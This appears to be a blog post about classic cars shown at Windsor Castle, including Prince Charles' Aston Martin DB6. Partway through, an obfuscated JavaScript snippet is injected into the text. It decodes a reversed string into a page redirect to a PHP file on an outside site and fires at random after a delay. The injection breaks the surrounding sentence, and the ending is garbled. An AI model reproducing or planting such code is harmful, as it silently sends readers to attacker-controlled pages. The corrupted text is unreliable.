More Ferrari love, this time featuring a 250 GT.
Tweed and turrets. The Upper Ward of Windsor Castle is a very genteel place for a day of car spotting. Here we have two fine gentlemen admiring a 1937 Lagonda LG45 Rapide Tourer (left) and a 1935 Squire 1500 Markham Roadster.
The swank of a 1938 Bentley 4¼ Litre ‘Embiricos’ Pourtout Coupé.
Being at a royal location, there had to be a royal exhibit. And alongside a couple of limousines, there was this – Prince Charles’ 1969 Aston Martin DB6 Volante MKII, last seen $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and-Kate-In-Aston-Martin.jpg” target=”_blank”>ferrying the newly married Duke and Duchess of Cambridge away from their wedding.
There now follow some shots of the kind of details you just don’t get on cars of today. Little things that add so much character to these ageing machines.
Especially as toothpaste.